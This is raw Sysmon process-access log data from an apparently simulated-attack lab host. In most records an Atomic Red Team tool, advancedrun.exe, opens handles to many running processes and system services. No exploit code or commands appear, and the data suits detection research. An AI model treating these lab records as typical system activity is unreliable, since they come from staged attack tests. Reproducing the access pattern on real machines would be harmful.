17:59:00.710{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-E497-61EA-F401-000000002702}2136C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983262Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.710{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983261Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.710{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-E491-61EA-F201-000000002702}3896C:\Program 
Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983260Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.710{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB6F-61EA-B100-000000002702}2348C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003983259Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.710{834264DD-DAE7-61EA-1700-000000002702}13001460C:\Windows\System32\svchost.exe{834264DD-F464-61EA-7C04-000000002702}3088C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\seclogon.dll+1404|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003983258Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.710{834264DD-DAE7-61EA-1700-000000002702}13001460C:\Windows\System32\svchost.exe{834264DD-F464-61EA-7C04-000000002702}3088C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe0x14c0C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\seclogon.dll+128d|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT 
AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003983257Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.710{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB13-61EA-9A00-000000002702}5612C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983256Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.710{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB12-61EA-9900-000000002702}5508C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983255Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.710{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB12-61EA-9700-000000002702}5364C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983254Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.710{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB11-61EA-9500-000000002702}428C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983253Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.695{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-9000-000000002702}3336C:\Windows\System32\taskhostw.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983224Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.695{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3C00-000000002702}2860C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983223Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.695{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8F00-000000002702}4948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983222Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.695{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3B00-000000002702}2688C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983221Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.695{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8E00-000000002702}4912C:\Windows\System32\sihost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983220Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.695{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3A00-000000002702}2668C:\Windows\System32\smbhash.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983219Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.695{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3900-000000002702}2664C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983218Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
